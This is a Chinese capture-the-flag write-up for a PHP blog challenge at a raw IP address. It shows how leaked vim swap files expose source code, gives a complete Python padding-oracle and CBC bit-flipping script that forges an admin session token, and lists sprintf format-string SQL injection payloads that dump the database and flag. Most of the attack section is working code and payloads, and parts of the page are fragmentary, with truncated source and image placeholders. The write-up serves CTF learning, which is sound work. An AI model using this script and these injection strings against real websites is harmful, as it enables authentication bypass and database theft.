Task
A simple blog .To discover the secret of it.
http://111.231.111.54/
Solution
源码泄露
http://111.231.111.54/.login.php.swp
http://111.231.111.54/.admin.php.swp
下载下来后,用vim -r恢复,得到源代码:
login.php
admin.php
".$row['title']."
".$row['content'];
die();
}else{
die("This article does not exist.");
}
}
?>
经过测试,存在账号和密码,分别为admin和admin。在login.php页面登陆后会跳转到admin.php。默认情况下,由于并非真实admin,在跳转后会显示you are not admin.
CBC翻转字节攻击
image.png
参考:
初学Padding Oracle Attack-----重点看这个
CBC字节翻转攻击
CBC字节翻转攻击-101Approach
脚本:
import requests
import base64
url='http://111.231.111.54/login.php'
N=16
def inject_token(token):
header={"Cookie":"PHPSESSID="+phpsession+";token="+token}
result=requests.post(url,headers=header)
return result
def xor(a, b):
return "".join([chr(ord(a[i])^ord(b[i%len(b)])) for i in xrange(len(a))])
def pad(string,N):
l=len(string)
if l!=N:
return string+chr(N-l)*(N-l)
def padding_oracle(N):
get=""
for i in xrange(1,N+1):
for j in xrange(0,256):
padding=xor(get,chr(i)*(i-1))
c=chr(0)*(16-i)+chr(j)+padding
result=inject_token(base64.b64encode(c))
if "Error!" not in result.content:
get=chr(j^i)+get
break
return get
def login(url):
payload = {
"username":"admin",
"password":"admin"
}
coo1 = {
"PHPSESSID":"j297k7o6d8stcbvi2c23naj5j6"
}
r = requests.post(url,cookies=coo1,data=payload,allow_redirects=False)
token = r.headers['Set-Cookie'].replace("%3D",'=').replace("%2F",'/').replace("%2B",'+').decode('base64')
session = "j297k7o6d8stcbvi2c23naj5j6"
return session, token
while 1:
phpsession,token = login(url)
middle1=padding_oracle(N)
print middle1
print "\n"
if(len(middle1)+1==16):
for i in xrange(0,256):
middle=chr(i)+middle1
print "token:"+token
print "middle:"+middle
plaintext=xor(middle,token);
print "plaintext:"+plaintext
des=pad('admin',N)
tmp=""
print des.encode("base64")
for i in xrange(16):
tmp+=chr(ord(token[i])^ord(plaintext[i])^ord(des[i]))
print tmp.encode('base64')
result=inject_token(base64.b64encode(tmp))
# print result.content
if "Login Form" not in result.content and "Error" not in result.content:
print result.content
print "success"
exit()
image.png
image.png
格式化串sql注入
spintf(),是一个格式化字符串函数,传入的字符可覆盖自身参数
参考:
WordPress SQLi谈PHP格式化字符串问题
本地测试:
";
$format2 = "hello,%2\$s two
";
$format3 = "hello,%1\$\' three
";
$format4 = "hello,%\$\' four
";
print_r("format string 1 : ".$format1);
print_r("Result: ".sprintf($format1,"chybeta-1","chybeta-2"));
print_r("format string 2 : ".$format2);
print_r("Result: ".sprintf($format2,"chybeta-1","chybeta-2"));
print_r("format string 3 : ".$format3);
print_r(sprintf($format3,"chybeta-1","chybeta-2"));
print_r("format string 4 : ".$format4);
print_r(sprintf($format4,"chybeta-1","chybeta-2"));
?>
image.png
前两个示例是演示选择参数的用法。第三个和前两个比较,变成类型%\,会直接跳过不处理,并直接输出。第四个和第三个对比,少了参数选择,这会导致报错,无法正常打印
通过百分号后的1,选择了一个参数(即id)不会爆错。利用类型%\,使得跳过。而原本在\后面的单引号,由于前面斜杠被当作了sprintf的类型,得以成功逃逸。
剩下的工作就是盲注了.
id=3&title=%1$ 'union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),@@hostname,@@datadir)#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(table_name)) from information_schema.tables where table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(column_name)) from information_schema.columns where table_name=0x6b6579 and table_schema=0x77656231#
id=3&title=%1$ 'union select 1,2,group_concat(distinct(f14g)) from web1.key#
数据库:web1
表名:key
字段名:f14g
image.png
小结
~··源码泄露
~··CBC翻转字节攻击
~··格式化串sql注入